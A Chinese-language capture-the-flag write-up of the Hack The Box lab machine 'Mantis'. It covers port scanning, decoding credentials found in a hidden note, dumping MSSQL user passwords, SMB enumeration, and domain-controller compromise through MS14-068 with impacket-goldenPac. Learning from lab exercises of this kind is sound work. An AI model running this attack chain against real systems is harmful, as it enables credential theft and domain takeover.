nmap -p- --min-rate 1000 -v -sV -sC -A -Pn 10.10.10.52
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-04 11:28:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1337/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-07-04T11:25:46
| Not valid after: 2053-07-04T11:25:46
| MD5: 4e49 4475 2b35 0d8a 3b2b 502c 1546 b06f
|_SHA-1: 9dc9 68ee a242 0a79 8fcd fae2 310a 3308 7326 e0e3
|_ssl-date: 2023-07-04T11:29:47+00:00; -1s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
9389/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open unknown
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49735/tcp open unknown
50255/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-07-04T11:25:46
| Not valid after: 2053-07-04T11:25:46
| MD5: 4e49 4475 2b35 0d8a 3b2b 502c 1546 b06f
|_SHA-1: 9dc9 68ee a242 0a79 8fcd fae2 310a 3308 7326 e0e3
|_ssl-date: 2023-07-04T11:29:48+00:00; -1s from scanner time.
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 34m17s, deviation: 1h30m45s, median: 0s
| ms-sql-info:
| 10.10.10.52:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2023-07-04T07:29:26-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-07-04T11:29:24
|_ start_date: 2023-07-04T11:25:39
获取到该域控为mantis.htb.local,域名为htb.local
Windows Server 2008 R2 Standard 7601 Service Pack 1
不存在域传送漏洞,rpc可以匿名连上但是无权限做操作,smb同样可以匿名登录但是啥也没有。1337端口是iis7的默认页面,8080的web是个博客
基本确认是ORCHARD CORE,搜了下历史漏洞基本都是xss,感觉应该不是这
回头看1337端口,存在iis短文件名猜解漏洞
一看就是aspnet_client默认目录,但也没啥东西。
第一个secure,做一个secure开头的字典爆破一下
grep ^secure /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt > ~/Downloads/temp/mantis/dir.txt
发现有个secure_note
txt内容为
Download OrchardCMS
Download SQL server 2014 Express ,create user "admin",and create orcharddb database
Launch IIS and add new website and point to Orchard CMS folder location.
Launch browser and navigate to http://localhost:8080
Set admin password and configure sQL server connection string.
Add blog pages with admin user.
很多空白行
Credentials stored in secure format OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001 SQL Server sa credentials file namez
web.config访问报了404
这一段二进制转成ascii字符串
bin_str = "010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001"
# 将每8个二进制位转化为一个ascii字符
ascii_str = ""
for i in range(0, len(bin_str), 8):
byte = bin_str[i:i+8]
ascii_str += chr(int(byte, 2))
print(ascii_str)
得到结果@dm!n_P@ssW0rd!,成功登录admin用户
数据库密码这是和文件名有关,看着也确实像base64
echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx"|base64 -d
解一下得到
6d2424716c5f53405f504073735730726421
一串16进制数字,再转一下
echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx"|base64 -d| xxd -r -p
得到m$$ql_S@_P@ssW0rd!
impacket-mssqlclient -db orcharddb admin:'m$$ql_S@_P@ssW0rd!'@10.10.10.52
但是没权限启动xp_cmdshell
#库名
SELECT name FROM master..sysdatabases;
#表名
SELECT TABLE_NAME FROM orcharddb.INFORMATION_SCHEMA.TABLES;
#列名
SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'blog_Orchard_Users_UserPartRecord'
select username,password from blog_Orchard_Users_UserPartRecord;
除了admin还有个james用户密码:J@m3s_P@ssW0rd!
不能登数据库但是smb登录成功
smbclient -L //10.10.10.52/ -U "James"%'J@m3s_P@ssW0rd!'
smbmap -H 10.10.10.52 -u James -p 'J@m3s_P@ssW0rd!'
smbmap -H 10.10.10.52 -u James -p 'J@m3s_P@ssW0rd!' -d htb.local -R "SYSVOL"
发现c和admin无权限,下俩个也只能读,sysvol中并未泄露密码
登录rpc查了下域用户信息
也没啥东西,折腾半天看wp发现直接用james用户去打ms14-068了
impacket-goldenPac htb.local/james:'J@m3s_P@ssW0rd!'@mantis.htb.local -dc-ip 10.10.10.52
获取flag
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。